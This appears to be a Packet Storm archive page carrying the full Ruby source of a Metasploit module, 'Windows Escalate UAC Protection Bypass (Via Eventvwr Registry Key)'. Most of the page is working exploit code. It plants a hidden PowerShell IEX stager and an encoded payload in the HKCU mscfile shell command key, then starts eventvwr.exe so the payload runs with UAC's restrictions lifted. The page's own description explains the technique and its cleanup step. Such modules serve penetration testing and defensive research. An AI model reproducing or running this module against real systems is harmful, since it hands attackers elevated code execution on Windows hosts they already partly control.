what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Windows Escalate UAC Protection Bypass

Windows Escalate UAC Protection Bypass
Posted Dec 2, 2016
Authored by Matt Graeber, OJ Reeves, Matt Nelson | Site metasploit.com

This Metasploit module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows Event Viewer is launched. It will spawn a second shell that has the UAC flag turned off. This Metasploit module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

tags | exploit, shell, registry
systems | windows
SHA-256 | 9f324275d7747e6056b99457eba72507d809e7fdc4d2bbdb300c55c482595517

Windows Escalate UAC Protection Bypass

Change Mirror Download
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Exploit::Powershell
include Post::Windows::Priv
include Post::Windows::Registry
include Post::Windows::Runas

EVENTVWR_DEL_KEY = "HKCU\\Software\\Classes\\mscfile"
EVENTVWR_WRITE_KEY = "HKCU\\Software\\Classes\\mscfile\\shell\\open\\command"
EXEC_REG_VAL = '' # This maps to "(Default)"
EXEC_REG_VAL_TYPE = 'REG_SZ'
EVENTVWR_PATH = "%WINDIR%\\System32\\eventvwr.exe"
PSH_PATH = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
CMD_MAX_LEN = 2081

def initialize(info={})
super(update_info(info,
'Name' => 'Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)',
'Description' => %q{
This module will bypass Windows UAC by hijacking a special key in the Registry under
the current user hive, and inserting a custom command that will get invoked when
the Windows Event Viewer is launched. It will spawn a second shell that has the UAC
flag turned off.

This module modifies a registry key, but cleans up the key once the payload has
been invoked.

The module does not require the architecture of the payload to match the OS. If
specifying EXE::Custom your DLL should call ExitProcess() after starting your
payload in a separate process.
},
'License' => MSF_LICENSE,
'Author' => [
'Matt Nelson', # UAC bypass discovery and research
'Matt Graeber', # UAC bypass discovery and research
'OJ Reeves' # MSF module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultTarget' => 0,
'References' => [
[
'URL', 'https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/',
'URL', 'https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1'
]
],
'DisclosureDate'=> 'Aug 15 2016'
))
end

def check
if sysinfo['OS'] =~ /Windows (7|8|2008|2012|10)/ && is_uac_enabled?
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end

def exploit
commspec = '%COMSPEC%'
registry_view = REGISTRY_VIEW_NATIVE

# Make sure we have a sane payload configuration

if sysinfo['Architecture'] == ARCH_X64
# On x64, check arch
if session.arch == ARCH_X86
# running WOW64, map the correct registry view
registry_view = REGISTRY_VIEW_64_BIT

if target_arch.first == ARCH_X64
# we have an x64 payload specified while using WOW64, so we need to
# move over to sysnative
commspec = '%WINDIR%\\Sysnative\\cmd.exe'
else
# Else, we're 32-bit payload, so need to ref wow64.
commspec = '%WINDIR%\\SysWOW64\\cmd.exe'
end
elsif target_arch.first == ARCH_X86
# We're x64, but invoking x86, so switch to SysWOW64
commspec = '%WINDIR%\\SysWOW64\\cmd.exe'
end
else
# if we're on x86, we can't handle x64 payloads
if target_arch.first == ARCH_X64
fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
end
end

# Validate that we can actually do things before we bother
# doing any more work
check_permissions!

case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."
)
when UAC_DEFAULT
print_good('UAC is set to Default')
print_good('BypassUAC can bypass this setting, continuing...')
when UAC_NO_PROMPT
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
shell_execute_exe
return
end

payload_value = rand_text_alpha(8)
psh_path = expand_path("#{PSH_PATH}")

template_path = Rex::Powershell::Templates::TEMPLATE_DIR
psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)

psh_stager = "\"IEX (Get-ItemProperty -Path #{EVENTVWR_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"

existing = registry_getvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""

if existing.empty?
registry_createkey(EVENTVWR_WRITE_KEY, registry_view)
end

print_status("Configuring payload and stager registry keys ...")
registry_setvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
registry_setvaldata(EVENTVWR_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)

# We can't invoke EventVwr.exe directly because CreateProcess fails with the
# dreaded 740 error (Program requires elevation). Instead, we must invoke
# cmd.exe and use that to fire off the binary.
cmd_path = expand_path(commspec)
cmd_args = expand_path("/c #{EVENTVWR_PATH}")
print_status("Executing payload: #{cmd_path} #{cmd_args}")

# We can't use cmd_exec here because it blocks, waiting for a result.
client.sys.process.execute(cmd_path, cmd_args, {'Hidden' => true})

# Wait a copule of seconds to give the payload a chance to fire before cleaning up
# TODO: fix this up to use something smarter than a timeout?
Rex::sleep(5)

handler(client)

print_status("Cleaining up registry keys ...")
if existing.empty?
registry_deletekey(EVENTVWR_DEL_KEY, registry_view)
else
registry_setvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
registry_deleteval(EVENTVWR_WRITE_KEY, payload_value, registry_view)
end

end

def check_permissions!
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

# Check if you are an admin
vprint_status('Checking admin status...')
admin_group = is_in_admin_group?

unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
end

unless is_in_admin_group?
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end

print_status('UAC is Enabled, checking level...')
if admin_group.nil?
print_error('Either whoami is not there or failed to execute')
print_error('Continuing under assumption you already checked...')
else
if admin_group
print_good('Part of Administrators group! Continuing...')
else
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
end

if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
end
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close